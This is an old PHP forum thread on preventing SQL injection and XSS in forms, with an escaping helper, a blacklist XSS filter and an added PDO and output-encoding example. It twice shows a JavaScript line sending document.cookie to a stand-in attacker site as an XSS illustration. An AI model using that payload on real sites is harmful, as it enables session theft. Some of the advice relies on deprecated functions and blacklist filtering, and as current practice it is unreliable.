Security PHP & Forms


Mutley

Recommended Posts

Are there any tips you can give about securing PHP and forms? I think with forms it is possible at times to do SQL injections; how can you prevent this and stop abuse with forms?

Maybe restrict characters used, I would like to know how to secure the scripts I create.

I just looked up mysql_real_escape_string in the PHP manual, so I can just use it among my variables within form fields. Looks easy and useful, I guess it disables certain characters or character combinations to be used.

Not heard of XSS, is it common?

[quote author=Mutley link=topic=110976.msg449407#msg449407 date=1160417975]
I just looked up mysql_real_escape_string in the PHP manual, so I can just use it among my variables within form fields. Looks easy and useful, I guess it disables certain characters or character combinations to be used.[/quote]


More or less yes :)
But you need to make sure that magic_quotes is turned off, because then the string will be escaped twice. And because mysql_real_escape_string() has a better effect compared to magic_quotes, it's important to use strip_slashes() before escaping (if magic_quotes is on).
I use this function to escape my strings:

[code]<?php

// Escape a value for use inside a MySQL query string.
function sql_quote($value)
{
   // If magic_quotes_gpc is on, PHP has already added slashes to request data;
   // remove them first so the value is not escaped twice.
   if(get_magic_quotes_gpc())
      $value = stripslashes($value);

   // Prefer the MySQL-aware escaping; fall back to addslashes() only if the
   // mysql extension is not loaded.
   if(function_exists("mysql_real_escape_string"))
      $value = mysql_real_escape_string($value);
   else
      $value = addslashes($value);

   return $value;
}

?>[/code]

Orio.

[quote author=Mutley link=topic=110976.msg449407#msg449407 date=1160417975]
Not heard of XSS, is it common?
[/quote]

Yeah, it's beginning to get quite common. It works like this:
1. User gets redirected to the hacker's page. Could be like this (javascript): [code]location.href='http://evil-hackers-site.com/harvest_cookies.php?data='+document.cookie;[/code]
2. The page harvests the cookie information.
3. The user is redirected back to the original page.

Here is some information about XSS:
http://ha.ckers.org/xss.html
http://en.wikipedia.org/wiki/Cross_site_scripting

[quote author=pedrobcabral link=topic=110976.msg449433#msg449433 date=1160419559]
Is that also prevented with the command spoken above?
[/quote]

No. For that you would have to do something like this:
[code]// $t holds the untrusted string; normalise entities first, then neutralise tag and script patterns
$t = html_entity_decode($t,ENT_QUOTES);
$t = str_replace("<","&#60;",$t);
$t = str_replace(">","&#62;",$t);
$t = str_replace("&quot;",htmlspecialchars('"'),$t);
// strip leading zeros from numeric entities so the checks below see one canonical form
$t = preg_replace("/&#0*([0-9]*);?/",'&#\\1;',$t);
// undo the entity-encoded spelling of "javascript:" so the next replacement catches it
$t = str_replace('&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;','javascript:',$t);
$t = preg_replace("/javascript:/i","nojava"/*&#97;v&#97;*/."script:",$t);
$t = preg_replace("/vbscript:/i","novb"/*&#98;*/."script:",$t);[/code]

More info on XSS prevention: http://blog.bitflux.ch/wiki/XSS_Prevention
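An added example that is not from this thread or any of its posters: the same form-handling problem as above, but using PDO prepared statements in place of the mysql_real_escape_string() quoting in Orio's post, and htmlspecialchars() at output time in place of the blacklist filter in Daniel0's post. The table name, DSN, credentials and redirect path are placeholders I assumed.

```php
<?php
// Added example, not from the thread. Assumes a table comments(id, body), a MySQL
// DSN and credentials; all of these are placeholders.
declare(strict_types=1);

function connect(): PDO
{
    $dsn = 'mysql:host=localhost;dbname=app;charset=utf8mb4'; // assumed DSN
    return new PDO($dsn, 'app_user', 'app_password', [ // placeholder credentials
        PDO::ATTR_ERRMODE          => PDO::ERRMODE_EXCEPTION,
        PDO::ATTR_EMULATE_PREPARES => false, // real server-side prepares, no client-side quoting
    ]);
}

// SQL side: the value travels as a bound parameter and is never spliced into the SQL
// text, so quotes inside it cannot change the statement (no magic_quotes juggling needed).
function saveComment(PDO $pdo, string $body): void
{
    if ($body === '' || strlen($body) > 2000) {
        throw new InvalidArgumentException('comment length out of range');
    }
    $stmt = $pdo->prepare('INSERT INTO comments (body) VALUES (:body)');
    $stmt->execute([':body' => $body]);
}

function recentComments(PDO $pdo, int $limit = 20): array
{
    $stmt = $pdo->prepare('SELECT body FROM comments ORDER BY id DESC LIMIT :limit');
    $stmt->bindValue(':limit', $limit, PDO::PARAM_INT); // LIMIT needs an integer bind
    $stmt->execute();
    return $stmt->fetchAll(PDO::FETCH_COLUMN);
}

// HTML side: SQL escaping does nothing against XSS. Encode at output time instead of
// trying to blacklist "javascript:" on input; ENT_QUOTES also covers attribute values.
function h(string $s): string
{
    return htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5, 'UTF-8');
}

if ($_SERVER['REQUEST_METHOD'] === 'POST') {
    saveComment(connect(), (string) ($_POST['body'] ?? ''));
    header('Location: /comments.php', true, 303); // assumed path; redirect after POST
    exit;
}

foreach (recentComments(connect()) as $body) {
    echo '<p>', h($body), "</p>\n";
}
```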

[quote author=Daniel0 link=topic=110976.msg449426#msg449426 date=1160418859]
[quote author=Mutley link=topic=110976.msg449407#msg449407 date=1160417975]
Not heard of XSS, is it common?
[/quote]

Yeah, it's beginning to get quite common. It works like this:
1. User gets redirected to the hacker's page. Could be like this (javascript): [code]location.href='http://evil-hackers-site.com/harvest_cookies.php?data='+document.cookie;[/code]
2. The page harvests the cookie information.
3. The user is redirected back to the original page.

Here is some information about XSS:
http://ha.ckers.org/xss.html
http://en.wikipedia.org/wiki/Cross_site_scripting
[/quote]

Very nice, Daniel0.

Here is an article from Developer Fusion on [url=http://www.developerfusion.co.uk/show/4656/]sql insertion[/url].

Good luck,
Tom
